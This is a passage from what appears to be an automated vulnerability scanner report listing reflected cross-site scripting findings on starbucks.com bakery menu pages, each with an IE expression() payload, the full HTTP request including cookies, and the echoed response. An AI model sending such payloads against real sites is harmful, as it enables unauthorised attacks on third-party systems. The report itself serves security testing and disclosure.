Date: Tue, 08 Feb 2011 03:52:40 GMT
Connection: close
Content-Length: 44079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread?ea7f1"style="x:expression(alert(1))"a7c7d383e8a=1"/>
...[SNIP]...

2.231. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/maple-oat-pecan-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d84b"style="x:expression(alert(1))"54ee8af6ce1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/maple-oat-pecan-scone?4d84b"style%3d"x%3aexpression(alert(1))"54ee8af6ce1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:11 GMT
Connection: close
Content-Length: 43961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone?4d84b"style="x:expression(alert(1))"54ee8af6ce1=1"/>
...[SNIP]...

2.232. http://www.starbucks.com/menu/food/bakery/marble-pound-cake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marble-pound-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd3db"style="x:expression(alert(1))"604a55d7060 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/marble-pound-cake?bd3db"style%3d"x%3aexpression(alert(1))"604a55d7060=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:34 GMT
Connection: close
Content-Length: 43704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marble-pound-cake?bd3db"style="x:expression(alert(1))"604a55d7060=1"/>
...[SNIP]...

2.233. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marshmallow-dream-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d416"style="x:expression(alert(1))"80939aba3c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/marshmallow-dream-bar?2d416"style%3d"x%3aexpression(alert(1))"80939aba3c2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:47 GMT
Connection: close
Content-Length: 43514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar?2d416"style="x:expression(alert(1))"80939aba3c2=1"/>
...[SNIP]...

2.234. http://www.starbucks.com/menu/food/bakery/morning-bun [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/morning-bun

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e918"style="x:expression(alert(1))"7d0bd106018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/morning-bun?4e918"style%3d"x%3aexpression(alert(1))"7d0bd106018=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:56 GMT
Connection: close
Content-Length: 43247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/morning-bun?4e918"style="x:expression(alert(1))"7d0bd106018=1"/>
...[SNIP]...

2.235. http://www.starbucks.com/menu/food/bakery/multigrain-bagel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/multigrain-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34ba5"style="x:expression(alert(1))"9c913b552b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/multigrain-bagel?34ba5"style%3d"x%3aexpression(alert(1))"9c913b552b8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:23 GMT
Connection: close
Content-Length: 43965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/multigrain-bagel?34ba5"style="x:expression(alert(1))"9c913b552b8=1"/>
...[SNIP]...

2.236. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/old-fashion-glazed-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67354"style="x:expression(alert(1))"1005e24d9c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/old-fashion-glazed-doughnut?67354"style%3d"x%3aexpression(alert(1))"1005e24d9c0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:27 GMT
Connection: close
Content-Length: 43941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut?67354"style="x:expression(alert(1))"1005e24d9c0=1"/>
...[SNIP]...

2.237. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/outrageous-oatmeal-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffe3f"style="x:expression(alert(1))"3b24c4e3b50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style%3d"x%3aexpression(alert(1))"3b24c4e3b50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:10 GMT
Connection: close
Content-Length: 43745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie?ffe3f"style="x:expression(alert(1))"3b24c4e3b50=1"/>
...[SNIP]...

2.238. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/petite-vanilla-bean-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8dda"style="x:expression(alert(1))"f64420d0491 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/petite-vanilla-bean-scone?f8dda"style%3d"x%3aexpression(alert(1))"f64420d0491=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:27 GMT
Connection: close
Content-Length: 44106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone?f8dda"style="x:expression(alert(1))"f64420d0491=1"/>
...[SNIP]...

2.239. http://www.starbucks.com/menu/food/bakery/plain-bagel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/plain-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa675"style="x:expression(alert(1))"b649a3a4e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/plain-bagel?aa675"style%3d"x%3aexpression(alert(1))"b649a3a4e01=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:19 GMT
Connection: close
Content-Length: 43603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/plain-bagel?aa675"style="x:expression(alert(1))"b649a3a4e01=1"/>
...[SNIP]...

2.240. http://www.starbucks.com/menu/food/bakery/pumpkin-bread [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/pumpkin-bread

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96de"style="x:expression(alert(1))"ee177beb35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/pumpkin-bread?d96de"style%3d"x%3aexpression(alert(1))"ee177beb35c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:33 GMT
Connection: close
Content-Length: 43511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/pumpkin-bread?d96de"style="x:expression(alert(1))"ee177beb35c=1"/>
...[SNIP]...

2.241. http://www.starbucks.com/menu/food/bakery/raspberry-scone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/raspberry-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59168"style%3d"x%3aexpression(alert(1))"e787100da19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59168"style="x:expression(alert(1))"e787100da19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/raspberry-scone?59168"style%3d"x%3aexpression(alert(1))"e787100da19=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:18 GMT
Connection: close
Content-Length: 43778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/raspberry-scone?59168"style="x:expression(alert(1))"e787100da19=1"/>
...[SNIP]...

2.242. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/red-velvet-cupcake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6abbb"style="x:expression(alert(1))"62d0d1600ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/red-velvet-cupcake?6abbb"style%3d"x%3aexpression(alert(1))"62d0d1600ca=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:10 GMT
Connection: close
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake?6abbb"style="x:expression(alert(1))"62d0d1600ca=1"/>
...[SNIP]...

2.243. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4bb"style="x:expression(alert(1))"fdc2532897b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:53 GMT
Connection: close
Content-Length: 44696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style="x:expression(alert(1))"fdc2532897b=1"/>
...[SNIP]...

2.244. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0103"style="x:expression(alert(1))"e7f8b0994af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:59 GMT
Connection: close
Content-Length: 44736

